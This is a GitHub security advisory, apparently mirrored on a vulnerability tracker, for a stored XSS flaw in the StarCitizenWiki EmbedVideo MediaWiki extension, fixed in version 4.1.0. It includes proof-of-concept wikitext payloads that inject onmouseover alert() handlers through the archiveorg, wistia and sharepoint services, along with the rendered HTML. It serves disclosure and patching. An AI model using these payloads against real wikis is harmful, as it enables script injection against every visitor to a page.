GHSA-5C7P-G73Q-RPG5

Vulnerability from github – Published: 2026-06-19 21:41 – Updated: 2026-06-19 21:41
VLAI
Summary
StarCitizenWiki Extension Embed Video: Stored XSS via malformed src url with $wgEmbedVideoRequireConsent enabled
Details

Summary

With $wgEmbedVideoRequireConsent enabled (the default), the urls for videos are stored in a json-ified data attributedata-mw-iframeconfig. When given a malformed url or id, the data-mw-iframeconfig attribute can be escaped via single quotes, allowing for html/javascript injection.

Details

The sprintf here adds the iframe config encoded as JSON here. When given a malicious url or id with a single quote, the $this->getUrl() call returns an unescaped payload that terminates the data-mw-iframeconfig attribute and allows for injecting attributes, including handlers, into the figure element. The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for single quotes to be introduced.

PoC

A couple of examples across services

Input:
<embedvideo service="archiveorg" id="x' onmouseover='alert(document.domain)' data-x='"></embedvideo>

Renders:
<figure class="embedvideo" data-service="archiveorg" data-mw-iframeconfig="{&quot;src&quot;:&quot;//archive.org/embed/x" onmouseover="alert(document.domain)" data-x="?autoplay=1&quot;}" style="width:640px">
<div class="embedvideo-wrapper" style="height:493px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>
Input:
{{#ev:wistia|https://wistia.com/medias/x'onmouseover='alert(document.domain)'}}

Renders:
<figure class="embedvideo" data-service="wistia" data-mw-iframeconfig="{&quot;src&quot;:&quot;//fast.wistia.net/embed/iframe/x" onmouseover="alert(document.domain)" ?autoplay="1&quot;}'" style="width:640px">
<div class="embedvideo-wrapper" style="height:360px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>
{{#ev:sharepoint|https://a.sharepoint.com/sites/x'onmouseover='alert(document.domain)'.aspx}}

Impact

Under the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.0.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "starcitizenwiki/embedvideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55692"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:41:57Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nWith $wgEmbedVideoRequireConsent enabled (the default), the urls for videos are stored in a json-ified data attribute`data-mw-iframeconfig`. When given a malformed url or id, the data-mw-iframeconfig attribute can be escaped via single quotes, allowing for html/javascript injection.\n\n### Details\nThe sprintf [here](https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/blob/a573a16d925ee0ea0d34b360856dc8ab0b88f822/includes/EmbedService/EmbedHtmlFormatter.php#L115-L120) adds the iframe config encoded as JSON [here](https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/blob/a573a16d925ee0ea0d34b360856dc8ab0b88f822/includes/EmbedService/AbstractEmbedService.php#L518). When given a malicious url or id with a single quote, the `$this-\u003egetUrl()` call returns an unescaped payload that terminates the data-mw-iframeconfig attribute and allows for injecting attributes, including handlers, into the figure element. The id regex for the `archiveorg` service and the url regexes for the `wistia` and `sharepoint` services allow for single quotes to be introduced.\n\n### PoC\nA couple of examples across services\n```\nInput:\n\u003cembedvideo service=\"archiveorg\" id=\"x\u0027 onmouseover=\u0027alert(document.domain)\u0027 data-x=\u0027\"\u003e\u003c/embedvideo\u003e\n\nRenders:\n\u003cfigure class=\"embedvideo\" data-service=\"archiveorg\" data-mw-iframeconfig=\"{\u0026quot;src\u0026quot;:\u0026quot;//archive.org/embed/x\" onmouseover=\"alert(document.domain)\" data-x=\"?autoplay=1\u0026quot;}\" style=\"width:640px\"\u003e\n\u003cdiv class=\"embedvideo-wrapper\" style=\"height:493px\"\u003e\u003cdiv class=\"embedvideo-consent\" data-show-privacy-notice=\"1\"\u003e\n...\n\u003c/div\u003e\n\u003c/figure\u003e\n```\n\n```\nInput:\n{{#ev:wistia|https://wistia.com/medias/x\u0027onmouseover=\u0027alert(document.domain)\u0027}}\n\nRenders:\n\u003cfigure class=\"embedvideo\" data-service=\"wistia\" data-mw-iframeconfig=\"{\u0026quot;src\u0026quot;:\u0026quot;//fast.wistia.net/embed/iframe/x\" onmouseover=\"alert(document.domain)\" ?autoplay=\"1\u0026quot;}\u0027\" style=\"width:640px\"\u003e\n\u003cdiv class=\"embedvideo-wrapper\" style=\"height:360px\"\u003e\u003cdiv class=\"embedvideo-consent\" data-show-privacy-notice=\"1\"\u003e\n...\n\u003c/div\u003e\n\u003c/figure\u003e\n```\n\n```\n{{#ev:sharepoint|https://a.sharepoint.com/sites/x\u0027onmouseover=\u0027alert(document.domain)\u0027.aspx}}\n```\n\n### Impact\nUnder the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.",
  "id": "GHSA-5c7p-g73q-rpg5",
  "modified": "2026-06-19T21:41:57Z",
  "published": "2026-06-19T21:41:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/security/advisories/GHSA-5c7p-g73q-rpg5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/commit/370156335b325bb81d14d89edf0a1f2643d50a84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo"
    },
    {
      "type": "WEB",
      "url": "https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/releases/tag/v4.1.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "StarCitizenWiki Extension Embed Video: Stored XSS via malformed src url with $wgEmbedVideoRequireConsent enabled"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…